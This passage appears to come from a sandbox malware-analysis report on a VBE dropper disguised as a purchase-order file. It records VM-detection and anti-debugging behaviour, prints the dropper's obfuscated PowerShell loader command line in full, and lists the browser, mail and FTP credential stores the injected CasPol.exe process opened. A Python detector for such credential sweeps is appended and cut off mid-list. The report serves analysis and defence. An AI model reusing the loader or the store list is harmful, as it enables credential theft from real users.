          Malware Analysis System Evasion

          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Program Files\qga\qga.exe
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Program Files\qga\qga.exe
          Source: powershell.exe, 00000004.00000002.1748826369.00000000074DA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEG
          Source: powershell.exe, 00000004.00000002.1743148136.00000000073ED000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEENT
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 7104Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 7104Thread sleep time: -90000s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 8152Thread sleep count: 639 > 30
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 8152Thread sleep time: -319500s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 7104Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeLast function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.dll
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9096
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWindow / User API: threadDelayed 639
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_1F9C0006 sldt word ptr [eax]
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 30000
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSystem information queried: ModuleInformation
          Source: wscript.exe, 00000000.00000003.761029190.0000016BB47B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $e6FK3ERR6PWWYlv/0xfK3CaSQEMUgrb1tJmU = Tox
          Source: powershell.exe, 00000004.00000002.1786397663.000000000ABA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
          Source: CasPol.exe, 00000011.00000002.5818301150.00000000014E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
          Source: powershell.exe, 00000004.00000002.1786397663.000000000ABA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
          Source: powershell.exe, 00000004.00000002.1786397663.000000000ABA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
          Source: powershell.exe, 00000004.00000002.1786397663.000000000ABA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
          Source: PO-08784 xlsx.vbeBinary or memory string: To3 = To3 & "e6FK3ERR6PWWYlv/0xfK3CaSQEMUgrb1tJmU"
          Source: powershell.exe, 00000004.00000002.1786397663.000000000ABA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
          Source: powershell.exe, 00000004.00000002.1748826369.00000000074DA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exeG
          Source: powershell.exe, 00000004.00000002.1786397663.000000000ABA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
          Source: powershell.exe, 00000004.00000002.1786397663.000000000ABA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
          Source: CasPol.exe, 00000011.00000002.5826675755.0000000001544000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: powershell.exe, 00000004.00000002.1743148136.00000000073ED000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exeent
          Source: powershell.exe, 00000004.00000002.1786397663.000000000ABA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
          Source: powershell.exe, 00000004.00000002.1786397663.000000000ABA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
          Source: powershell.exe, 00000004.00000002.1786397663.000000000ABA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
          Source: powershell.exe, 00000004.00000002.1786397663.000000000ABA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat

          Anti Debugging

          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread information set: HideFromDebugger
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_20456418 LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeMemory allocated: page read and write | page guard
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$thyridia = """ovafadandda-ditsiyfipoteco ro-fltmuyzoppreabdinevefpridenabisetfoilroelnmy fe'boujassuiinnsogud hosmiyfesdetnoeidmsa;vaumosphistnbegau vispuynesbrttuevrmta.harreubensctmaievmsterk.iniinnwhthoeoerafoshpsosejedercavchilicpiebrsdi;trpraudibfollaialcvo bospatalasktgoigacgu licdelswastsunsre prmopesptskhdeymilno1en di{ci[dedanloplgliirmcopopocurbutaf(ef`"""unktoelorsensrepelli3ko2ha`"""fr)ji]vopatudrbunlreimicno kosdrtscatitkriircpo chesaxuntslelyrtyngr sriejnbethu peglietetdetkahfirhveunabrdtrtinispmjeeitsco(riiugnjutcr bepinrskostgunrfi8op2we,raiswnsytan meffirskepsmsuakhdov,priafnhytre drtlieunlcoeno,reitvnmitfo witabrfuesydcyiaf,raisbncotur optmyistmtr)sp;ti[bodkrlfilmeiromunpkeoafrcitsu(ha`"""geuunsseenarwi3su2sc`"""us)ci]nypceutobpeladiefcud sqscotgaaretnaidrcro smebyxdotjaegtrtrnpe blichnadtja pocinlacityepanbrtulttrofosrectirvaemdelenbr(neistngltov siiudnwrkliosprbapre,coicencotme zetcoefrkplnfaore)al;un[mudunlcalheinumfrptyopirbrtki(fo`"""wakwoetwrfanfreunlpr3ru2su`"""st)fr]udpdeualbcaltricrcre cosrutgraaltveitacti vaeslxustboenergenpa diisunoktca ineovxhapsaauhnpldunebrnsavpaistrprotrndrmstehynfetflswotunrsvidanabgwesfi(eriblnretst rerecocytsotdeepo,teichnretsu fobufugalma,biimonbitde inebrnoetafoco)re;ra[pldlalavlfuiafmskpbeoanrsutko(te`"""beuelsjieelrst3mu2fy`"""di)to]popvauanbbrlmaipucos ovsretpeaprtpeiufcso toefoxovtmaenortensl prifrnqutbl ameegnpuubamaucpihpoidilnedbewisiefnfldfrokiwbesso(miihontatfu holmiiovtrahfoeindro,anigencatal hydreifoosubmoosl,meiolntutch poataluvuvanungal)va;tr[emdselkrlgoijamprpcoocrrretst(yo`"""mawbeivinlamcombi.nldselfllhe`"""de)no]ilpopuchbtelomibucfo frsretcoachtudijucsa unepnxretmaekvrlgnel veimenintbr injauoopyhusacesetdicdiagepsutbeuavrouece(idiwenfotex afkpeoandunipofno,seispnretbe unvfaelijbe,friesnwitop 
abedimchpuntmoisp,ceiunnlatfl birureudaviccytduine)po;no[nodtnlhylouiopmakpdeoberaptir(un`"""opkhmenirdrnamemolgr3sf2el`"""kr)li]scpviugrbbrlriiitcpr resfrtgsairtapipacpo uneuhxkrtsyemarranir skvafobyiopdde imgjulreofabdianalspmmaelimmyovarbryhjsettsuatutanufrsub(snifrnretra suawrnjelepgsksemiud)ou;cy[fiddrlsplclibamanpatocorbotno(si`"""ovkanemirunngaecolpr3co2na`"""gr)pr]moptouhabdrlphiskcna sksmatstasetdiiaicva haelyxfotuneenrbrnco saijunpstak unisnsobvpuacolspipldagcmootodstesupsuamagsuesa(ejiafnhytbi caggaakauudmca)fr;fa[codphlhylunidimtypovorurmitfo(mi`"""unkseelirbenriejulch3sl2an`"""sa)si]ampwhuelbsellaisuckl mtsrbtloasptreifocaj mieunxevtsneforbuncu amiteneftte suhoreovadapbirpleseabildelsoorycac(doikonsltfo sthfrablnbedbi,esihennotrk apfunasplsesol,biidansutsu cohdruconlegba,afitrnnetno routrnrbdseessrne)fo;ko[fldpilpelstidamtephyosyrsytje(ub`"""brgundreigl3ud2un`"""ep)pr]mipunuunbfoladiafcba fesshtdiaditbeidecve sieyaxsktkeeprrrenin coimynnetbl unccormeeevaimtskethspaoheluhiexdalblerdiucascahpa(beibonvatuh cafsyohirba)mi;pe[cuddilouldeiaimlapkrogrrovtdi(ar`"""t
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$thyridia = """ovafadandda-ditsiyfipoteco ro-fltmuyzoppreabdinevefpridenabisetfoilroelnmy fe'boujassuiinnsogud hosmiyfesdetnoeidmsa;vaumosphistnbegau vispuynesbrttuevrmta.harreubensctmaievmsterk.iniinnwhthoeoerafoshpsosejedercavchilicpiebrsdi;trpraudibfollaialcvo bospatalasktgoigacgu licdelswastsunsre prmopesptskhdeymilno1en di{ci[dedanloplgliirmcopopocurbutaf(ef`"""unktoelorsensrepelli3ko2ha`"""fr)ji]vopatudrbunlreimicno kosdrtscatitkriircpo chesaxuntslelyrtyngr sriejnbethu peglietetdetkahfirhveunabrdtrtinispmjeeitsco(riiugnjutcr bepinrskostgunrfi8op2we,raiswnsytan meffirskepsmsuakhdov,priafnhytre drtlieunlcoeno,reitvnmitfo witabrfuesydcyiaf,raisbncotur optmyistmtr)sp;ti[bodkrlfilmeiromunpkeoafrcitsu(ha`"""geuunsseenarwi3su2sc`"""us)ci]nypceutobpeladiefcud sqscotgaaretnaidrcro smebyxdotjaegtrtrnpe blichnadtja pocinlacityepanbrtulttrofosrectirvaemdelenbr(neistngltov siiudnwrkliosprbapre,coicencotme zetcoefrkplnfaore)al;un[mudunlcalheinumfrptyopirbrtki(fo`"""wakwoetwrfanfreunlpr3ru2su`"""st)fr]udpdeualbcaltricrcre cosrutgraaltveitacti vaeslxustboenergenpa diisunoktca ineovxhapsaauhnpldunebrnsavpaistrprotrndrmstehynfetflswotunrsvidanabgwesfi(eriblnretst rerecocytsotdeepo,teichnretsu fobufugalma,biimonbitde inebrnoetafoco)re;ra[pldlalavlfuiafmskpbeoanrsutko(te`"""beuelsjieelrst3mu2fy`"""di)to]popvauanbbrlmaipucos ovsretpeaprtpeiufcso toefoxovtmaenortensl prifrnqutbl ameegnpuubamaucpihpoidilnedbewisiefnfldfrokiwbesso(miihontatfu holmiiovtrahfoeindro,anigencatal hydreifoosubmoosl,meiolntutch poataluvuvanungal)va;tr[emdselkrlgoijamprpcoocrrretst(yo`"""mawbeivinlamcombi.nldselfllhe`"""de)no]ilpopuchbtelomibucfo frsretcoachtudijucsa unepnxretmaekvrlgnel veimenintbr injauoopyhusacesetdicdiagepsutbeuavrouece(idiwenfotex afkpeoandunipofno,seispnretbe unvfaelijbe,friesnwitop 
abedimchpuntmoisp,ceiunnlatfl birureudaviccytduine)po;no[nodtnlhylouiopmakpdeoberaptir(un`"""opkhmenirdrnamemolgr3sf2el`"""kr)li]scpviugrbbrlriiitcpr resfrtgsairtapipacpo uneuhxkrtsyemarranir skvafobyiopdde imgjulreofabdianalspmmaelimmyovarbryhjsettsuatutanufrsub(snifrnretra suawrnjelepgsksemiud)ou;cy[fiddrlsplclibamanpatocorbotno(si`"""ovkanemirunngaecolpr3co2na`"""gr)pr]moptouhabdrlphiskcna sksmatstasetdiiaicva haelyxfotuneenrbrnco saijunpstak unisnsobvpuacolspipldagcmootodstesupsuamagsuesa(ejiafnhytbi caggaakauudmca)fr;fa[codphlhylunidimtypovorurmitfo(mi`"""unkseelirbenriejulch3sl2an`"""sa)si]ampwhuelbsellaisuckl mtsrbtloasptreifocaj mieunxevtsneforbuncu amiteneftte suhoreovadapbirpleseabildelsoorycac(doikonsltfo sthfrablnbedbi,esihennotrk apfunasplsesol,biidansutsu cohdruconlegba,afitrnnetno routrnrbdseessrne)fo;ko[fldpilpelstidamtephyosyrsytje(ub`"""brgundreigl3ud2un`"""ep)pr]mipunuunbfoladiafcba fesshtdiaditbeidecve sieyaxsktkeeprrrenin coimynnetbl unccormeeevaimtskethspaoheluhiexdalblerdiucascahpa(beibonvatuh cafsyohirba)mi;pe[cuddilouldeiaimlapkrogrrovtdi(ar`"""t
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy Fe'BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa.HaRReuBenSctMaiEvmSteRk.InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En di{Ci[DeDAnlOplglIIrmCopOpocurbutAf(Ef`"""UnkToeLorSenSrePelLi3Ko2ha`"""Fr)ji]VopAtuDrbunlReiMicNo KosDrtScaTitKriIrcPo CheSaxUntSleLyrtynGr SriEjnBetHu PeGLieTetDeTKahFirHveUnaBrdtrTInispmJeeItsCo(riiUgnJutCr BePInrSkoStgUnrFi8Op2We,RaiSwnSytAn MeFFirSkePsmSuaKhdOv,PriAfnHytre drTLieUnlCoeNo,ReiTvnMitFo WiTAbrFueSydCyiAf,raisbnCotUr OpTmyiStmTr)Sp;Ti[BoDKrlFilMeIRomUnpKeoAfrCitSu(Ha`"""GeuunsSeeNarWi3Su2Sc`"""Us)Ci]NypCeuTobPelAdiEfcUd SqsCotGaaRetNaiDrcRo SmebyxDotJaeGtrTrnPe BliChnAdtJa PoCInlAciTyePanBrtUlTTroFoSRecTirVaeMdeLenBr(NeiStnGltOv SiIUdnWrkLioSprBapre,coicenCotMe ZetCoeFrkplnFaore)Al;Un[MuDUnlcalHeINumfrpTyoPirBrtKi(Fo`"""WakWoeTwrFanFreUnlPr3Ru2Su`"""St)Fr]UdpdeuAlbCalTriCrcRe CosRutGraAltVeiTacTi VaeSlxUstboeNerGenPa DiiSunOktCa InEOvxhapSaaUhnPldUnEBrnSavPaistrProTrnDrmSteHynFetflSWotunrSviDanAbgWesFi(EriBlnretSt ReREcoCytSotDeePo,TeiChnRetSu FoBUfugalMa,BiiMonBitDe InEBrnOetafoCo)Re;Ra[PlDLalAvlFuIAfmSkpBeoAnrSutKo(te`"""BeuElsJieElrst3Mu2Fy`"""Di)To]PopVauanbBrlMaiPucOs OvsRetPeaPrtPeiUfcSo toeFoxOvtMaeNorTenSl PriFrnQutbl AmEEgnPuuBamauCPihPoiDilNedBeWIsiEfnFldFrokiwbesSo(MiiHonTatFu hoLMiiOvtRahFoeIndRo,aniGenCatal HyDReiFooSubMooSl,MeiOlnTutCh PoATalUvuVanUngAl)Va;Tr[emDSelKrlGoIJamPrpCooCrrRetst(Yo`"""MawbeiVinLamComBi.NldSelFllHe`"""De)No]IlpOpuChbTelOmiBucFo frsRetCoaChtUdiJucSa UnePnxRetMaekvrLgnEl veiMenIntBr InjAuoOpyHuSAceSetDiCDiaGepSutBeuAvrOueCe(IdiWenfotEx AfKPeoAndUniPofNo,SeiSpnRetBe UnVFaeLijBe,FriEsnWitOp 
abEDimChpUntMoiSp,CeiUnnLatFl BiRUreUdaVicCytduiNe)Po;No[NoDTnlHylOuIOpmAkpdeoBerAptIr(Un`"""OpkHmeNirdrnAmeMolGr3Sf2El`"""Kr)Li]ScpViuGrbBrlRiiItcPr ResFrtGsaIrtApiPacPo UneUhxKrtSyeMarRanIr skvAfoByiOpdDe ImGjulReoFabDiaNalSpMMaeLimMyoVarBryhjSEttSuaTutAnufrsUb(sniFrnretRa SuAWrnJelEpgSksEmiUd)Ou;Cy[FiDDrlSplClIbamanpAtoCorBotNo(Si`"""OvkAneMirUnnGaeColPr3Co2Na`"""Gr)Pr]mopTouHabdrlPhiSkcNa sksmatStaSetDiiAicva HaeLyxFotUneEnrbrnCo SaiJunPstAk UnISnsObVPuaColSpiPldAgCMooTodSteSuPSuaMagsueSa(EjiAfnHytBi CaGGaaKauudmCa)Fr;Fa[CoDPhlHylUnIDimTypOvorurMitFo(Mi`"""UnkSeeLirBenRieJulCh3Sl2An`"""Sa)Si]AmpwhuElbSelLaiSucKl MtsRbtLoaSptReiFocAj MieunxEvtSneForBunCu AmiTenEftTe SuHOreOvaDapBiRpleSeABilDelsooRycac(DoiKonSltFo StHFraBlnBedBi,EsihenNotRk ApFUnaSplSesOl,BiiDanSutSu coHDruConLegBa,AfiTrnNetNo RoUTrnRbdSeeSsrNe)Fo;Ko[FlDPilPelStIDamTepHyoSyrSytJe(Ub`"""BrgUndReiGl3Ud2Un`"""Ep)Pr]MipUnuUnbFolAdiAfcBa FesShtDiaDitBeiDecVe SieYaxSktKeePrrRenIn CoiMynNetBl UnCCorMeeEvaImtskeThSPaoHelUhiExdAlBLerDiuCascahPa(BeiBonVatUh CaFSyoHirBa)Mi;Pe[CuDDilOulDeIAimLapKroGrrOvtDi(Ar`"""T
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.cmdline
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6FA6.tmp" "c:\Users\user\AppData\Local\Temp\3uneeqsg\CSC7012D3CA523F4D77AF1E1BF90852658.TMP"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Security\2.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          barindex
Source: Yara match | File source: 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: Yara match | File source: 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
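The file and registry targets above are the credential stores of nine unrelated applications (mail clients, FTP/SCP clients, browsers), all opened by CasPol.exe, the .NET Code Access Security Policy tool, which has no legitimate reason to read any of them. The following added example (editorial, not Joe Sandbox output) is detection logic that a file/registry-access telemetry pipeline could run over such events: it classifies each target against the store list taken from this report and raises an alert when a single process sweeps stores of two or more application families, or reads a store its own image does not own. The event records, process IDs, the two benign processes and the owning-image allowlist are constructed assumptions.

```python
"""Credential-store sweep detector: flags a process that opens the password/session
stores of unrelated applications. Added example (not Joe Sandbox code); store paths
come from this report, events and the owning-image table are constructed assumptions."""
from collections import defaultdict

# Credential stores the report shows CasPol.exe opening, keyed by owning application.
# Matching is a case-insensitive substring test on the normalised target, so the
# per-user prefix (C:\Users\<name>\) and the registry hive prefix do not matter.
CREDENTIAL_STORES = {
    "thunderbird": r"AppData\Roaming\Thunderbird\profiles.ini",
    "incredimail": r"Software\IncrediMail\Identities",
    "outlook":     r"Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676",
    "winscp":      r"SOFTWARE\Martin Prikryl\WinSCP 2\Sessions",
    "filezilla":   r"AppData\Roaming\FileZilla\recentservers.xml",
    "smartftp":    r"AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect",
    "firefox":     r"AppData\Roaming\Mozilla\Firefox\profiles.ini",
    "edge":        r"AppData\Local\Microsoft\Edge\User Data\Default\Login Data",
    "chrome":      r"AppData\Local\Google\Chrome\User Data\Default\Login Data",
}

# Image names allowed to read each family's store (assumed allowlist for the example;
# in production this would come from the EDR's known-application catalogue).
OWNING_IMAGES = {
    "thunderbird": {"thunderbird.exe"}, "incredimail": {"incmail.exe"},
    "outlook": {"outlook.exe"},         "winscp": {"winscp.exe"},
    "filezilla": {"filezilla.exe"},     "smartftp": {"smartftp.exe"},
    "firefox": {"firefox.exe"},         "edge": {"msedge.exe"},
    "chrome": {"chrome.exe"},
}

# Constructed file/registry-open events (EDR style): image, pid, target. The CasPol.exe
# targets are the ones listed in the report; pids and the two benign processes are invented.
CASPOL = r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe"
SAMPLE_EVENTS = [
    {"image": CASPOL, "pid": 4212, "target": r"C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini"},
    {"image": CASPOL, "pid": 4212, "target": r"HKEY_CURRENT_USER\Software\IncrediMail\Identities"},
    {"image": CASPOL, "pid": 4212, "target": r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676"},
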